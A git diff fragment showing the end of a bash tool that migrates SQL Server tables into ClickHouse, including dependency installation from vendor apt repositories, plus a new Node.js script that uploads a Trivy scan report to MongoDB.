ensure_clickhouse_client + ensure_mssql_env + + local ch_db="${1:-${CH_DATABASE:-default}}" + local out_dir="${2:-./mssql_export_all}" + local schema_filter="${3:-}" + local tables_file="${4:-}" + + local line schema_name table_name tables_rows + local discovered=0 + local migrated=0 + local skipped=0 + local use_file=0 + + [[ -n "$ch_db" ]] || die "Provide --ch-database or CH_DATABASE" + mkdir -p "$out_dir" + + run_clickhouse_query "CREATE DATABASE IF NOT EXISTS \`$(escape_ch_ident "$ch_db")\`" + + if [[ -n "$tables_file" ]]; then + [[ -f "$tables_file" ]] || die "Tables list file not found: $tables_file" + use_file=1 + while IFS= read -r line || [[ -n "$line" ]]; do + schema_name="" + table_name="" + parse_mssql_table_line "$line" schema_name table_name || continue + discovered=$((discovered + 1)) + if migrate_one_mssql_table "$ch_db" "$out_dir" "$schema_name" "$table_name"; then + migrated=$((migrated + 1)) + else + skipped=$((skipped + 1)) + fi + done <"$tables_file" + else + tables_rows="$(sqlcmd_query "$(mssql_discovery_sql_union "$schema_filter")")" + + while IFS= read -r line || [[ -n "$line" ]]; do + line="$(strip_cr "$line")" + [[ -n "$line" ]] || continue + schema_name="${line%%$'\t'*}" + table_name="${line#*$'\t'}" + schema_name="$(strip_cr "$schema_name")" + table_name="$(strip_cr "$table_name")" + + schema_name="${schema_name#"${schema_name%%[![:space:]]*}"}" + schema_name="${schema_name%"${schema_name##*[![:space:]]}"}" + table_name="${table_name#"${table_name%%[![:space:]]*}"}" + table_name="${table_name%"${table_name##*[![:space:]]}"}" + + [[ -n "$schema_name" && -n "$table_name" ]] || continue + discovered=$((discovered + 1)) + if migrate_one_mssql_table "$ch_db" "$out_dir" "$schema_name" "$table_name"; then + migrated=$((migrated + 1)) + else + skipped=$((skipped + 1)) + fi + done <<<"$tables_rows" + fi + + if [[ "$discovered" -le 0 ]]; then + if [[ "$use_file" -eq 1 ]]; then + die "No valid SCHEMA.TABLE rows in tables file (after skipping blanks/comments): ${tables_file}" + else + die "No SQL Server tables discovered in ${MSSQL_DATABASE}. Run: ${SCRIPT_NAME} list-tables (or grant VIEW DEFINITION + db_datareader)." + fi + fi + + if [[ "$migrated" -eq 0 ]]; then + migrate_permission_hint + die "No tables migrated successfully (had $discovered candidate(s), $skipped skipped)." + fi + + if [[ "$use_file" -eq 0 && "$discovered" -eq 1 ]]; then + migrate_permission_hint + fi + + echo "Done. Queued $discovered table(s), migrated $migrated, skipped/failed-metadata $skipped into ClickHouse database ${ch_db}." +} + +install_deps() { + [[ $(id -u) -eq 0 ]] || command -v sudo >/dev/null 2>&1 || die "Need sudo for --install-deps" + local SUDO="" + [[ $(id -u) -ne 0 ]] && SUDO="sudo" + + . /etc/os-release || die "Cannot read /etc/os-release" + [[ "${ID:-}" == "ubuntu" || "${ID:-}" == "debian" || "${ID_LIKE:-}" == *"debian"* ]] \ + || die "This installer expects Ubuntu or Debian." + + $SUDO apt-get update + $SUDO apt-get install -y apt-transport-https ca-certificates curl gnupg lsb-release + + # Microsoft ODBC + sqlcmd + curl -fsSL https://packages.microsoft.com/keys/microsoft.asc \ + | $SUDO gpg --dearmor -o /etc/apt/trusted.gpg.d/microsoft.gpg + curl -fsSL "https://packages.microsoft.com/config/ubuntu/$(lsb_release -rs)/prod.list" \ + | $SUDO tee /etc/apt/sources.list.d/mssql-release.list >/dev/null + $SUDO apt-get update + ACCEPT_EULA=Y $SUDO apt-get install -y msodbcsql18 mssql-tools18 unixodbc-dev + echo 'export PATH="$PATH:/opt/mssql-tools18/bin"' >>"$HOME/.bashrc" || true + export PATH="$PATH:/opt/mssql-tools18/bin" + + # ClickHouse client + $SUDO mkdir -p /etc/apt/keyrings + curl -fsSL https://packages.clickhouse.com/rpm/lifecyclePolicies/policy.json >/dev/null 2>&1 || true + curl -fsSL https://packages.clickhouse.com/deb/pubkey.gpg \ + | $SUDO gpg --dearmor -o /etc/apt/keyrings/clickhouse.gpg + echo "deb [signed-by=/etc/apt/keyrings/clickhouse.gpg] https://packages.clickhouse.com/deb stable main" \ + | $SUDO tee /etc/apt/sources.list.d/clickhouse.list >/dev/null + $SUDO apt-get update + $SUDO apt-get install -y clickhouse-client + + echo "Installed. Open a new shell or run: export PATH=\"\$PATH:/opt/mssql-tools18/bin\"" +} + +run_export() { + ensure_sqlcmd + ensure_mssql_env + + local mssql_table="${1:-}" + local mssql_query="${2:-}" + local out_file="${3:-./mssql_export.tsv}" + + local conn_args=() + mapfile -t conn_args < <(sqlcmd_conn_args) + + local sql + if [[ -n "$mssql_query" ]]; then + sql="$mssql_query" + else + [[ -n "$mssql_table" ]] || die "Provide --mssql-table or --mssql-query" + sql="SELECT * FROM ${mssql_table}" + fi + + mkdir -p "$(dirname "$out_file")" + + # UTF-8 in/out; tab separator; no column headers (-h -1); trim trailing spaces (-W). + sqlcmd "${conn_args[@]}" \ + -Q "SET NOCOUNT ON; ${sql}" \ + -h -1 -W -s "$(printf '\t')" -w 65535 -f i:65001,o:65001 -o "$out_file" -b + + echo "Exported to $out_file ($(wc -l <"$out_file") lines)" +} + +run_import() { + local ch_db="${1:-${CH_DATABASE:-default}}" + local ch_table="${2:-}" + local in_file="${3:-./mssql_export.tsv}" + + [[ -n "$ch_table" ]] || die "Provide --ch-table" + [[ -f "$in_file" ]] || die "File not found: $in_file" + + run_clickhouse_insert "INSERT INTO \`$(escape_ch_ident "$ch_db")\`.\`$(escape_ch_ident "$ch_table")\` FORMAT TabSeparated" "$in_file" + echo "Imported $in_file into ${ch_db}.${ch_table}" +} + +main() { + [[ $# -ge 1 ]] || { + usage + exit 1 + } + + local cmd="$1" + shift || true + + if [[ "$cmd" == "-h" || "$cmd" == "--help" ]]; then + usage + exit 0 + fi + + if [[ "$cmd" == "--install-deps" ]]; then + install_deps + exit 0 + fi + + local mssql_table="" + local mssql_query="" + local mssql_schema="" + local ch_database="" + local ch_table="" + local out_file="./mssql_export.tsv" + local out_dir="./mssql_export_all" + local tables_file="${MSSQL_TABLES_FILE:-}" + + while [[ $# -gt 0 ]]; do + case "$1" in + --mssql-table) + mssql_table="$2" + shift 2 + ;; + --mssql-query) + mssql_query="$2" + shift 2 + ;; + --ch-database) + ch_database="$2" + shift 2 + ;; + --mssql-schema) + mssql_schema="$2" + shift 2 + ;; + --ch-table) + ch_table="$2" + shift 2 + ;; + --out) + out_file="$2" + shift 2 + ;; + --out-dir) + out_dir="$2" + shift 2 + ;; + --tables-file) + tables_file="$2" + shift 2 + ;; + *) + die "Unknown option: $1" + ;; + esac + done + + case "$cmd" in + export) + run_export "$mssql_table" "$mssql_query" "$out_file" + ;; + import) + run_import "${ch_database:-${CH_DATABASE:-default}}" "$ch_table" "$out_file" + ;; + export-import) + [[ -n "$ch_table" ]] || die "export-import requires --ch-table" + run_export "$mssql_table" "$mssql_query" "$out_file" + run_import "${ch_database:-${CH_DATABASE:-default}}" "$ch_table" "$out_file" + ;; + list-tables) + list_mssql_tables "$mssql_schema" + ;; + migrate-db) + run_migrate_db "${ch_database:-${CH_DATABASE:-default}}" "$out_dir" "$mssql_schema" "$tables_file" + ;; + *) + usage + die "Unknown command: $cmd" + ;; + esac +} + +main "$@" diff --git a/scripts/upload-report-to-mongodb.js b/scripts/upload-report-to-mongodb.js new file mode 100644 index 0000000..0bc6fb8 --- /dev/null +++ b/scripts/upload-report-to-mongodb.js @@ -0,0 +1,86 @@ +/** + * Upload report.json to MongoDB (official driver). + * + * Install: npm install mongodb + * + * Run (self-hosted Mongo on Ubuntu host 10.200.25.150): + * MONGODB_URI="mongodb://uploader:PASSWORD@10.200.25.150:27017/CICD?authSource=admin&directConnection=true&appName=trivy-uploader" \ + * node scripts/upload-report-to-mongodb.js + * + * Optional env: + * REPORT_PATH=../report.json + * DB_NAME=CICD + * COLLECTION=trivy_reports + */ + +const fs = require("fs"); +const path = require("path"); +const { MongoClient } = require("mongodb"); + +const PLACEHOLDER_PWD = "CHANGE_ME_STRONG"; +const DEFAULT_URI ="mongodb://uploader:STRONG_UPLOADER_PWD@10.200.25.150:27017/CICD?authSource=admin"; + +const uri = process.env.MONGODB_URI || DEFAULT_URI; +const reportPath = path.resolve( + process.env.REPORT_PATH || path.join(__dirname, "..", "report.json") +); +const dbName = process.env.DB_NAME || "CICD"; +const collectionName = process.env.COLLECTION || "trivy_reports"; + +function maskUri(u) { + return u.replace(/(:\/\/[^:]+:)[^@]+(@)/, "$1****$2"); +} + +async function main() { + if (!uri) { + console.error("Set MONGODB_URI to your MongoDB connection string."); + process.exit(1); + } + if (uri.includes(PLACEHOLDER_PWD)) { + console.error( + `Refusing to run: MONGODB_URI is not set and the default URI still has the placeholder password "${PLACEHOLDER_PWD}".\n` + + "Export MONGODB_URI before running, e.g.:\n" + + " export MONGODB_URI='mongodb://uploader:REAL_PASSWORD@10.200.25.150:27017/CICD?authSource=admin&directConnection=true&appName=trivy-uploader'" + ); + process.exit(1); + } + console.log("Using URI:", maskUri(uri)); + if (!fs.existsSync(reportPath)) { + console.error("Report file not found:", reportPath); + process.exit(1); + } + + const raw = fs.readFileSync(reportPath, "utf8"); + const doc = JSON.parse(raw); + + // Single BSON document limit is 16 MB; add size hint + const approxBytes = Buffer.byteLength(raw, "utf8"); + if (approxBytes > 15 * 1024 * 1024) { + console.warn( + `Warning: JSON is ~${(approxBytes / 1024 / 1024).toFixed(2)} MB; MongoDB limit is 16 MB per document. Consider splitting Results.` + ); + } + + const client = new MongoClient(uri); + + try { + await client.connect(); + const coll = client.db(dbName).collection(collectionName); + + const payload = { + ...doc, + _uploadedAt: new Date(), + _sourceFile: path.basename(reportPath), + }; + + const result = await coll.insertOne(payload); + console.log("Inserted _id:", result.insertedId.toString()); + } finally { + await client.close(); + } +} + +main().catch((err) => { + console.error(err); + process.exit(1); +});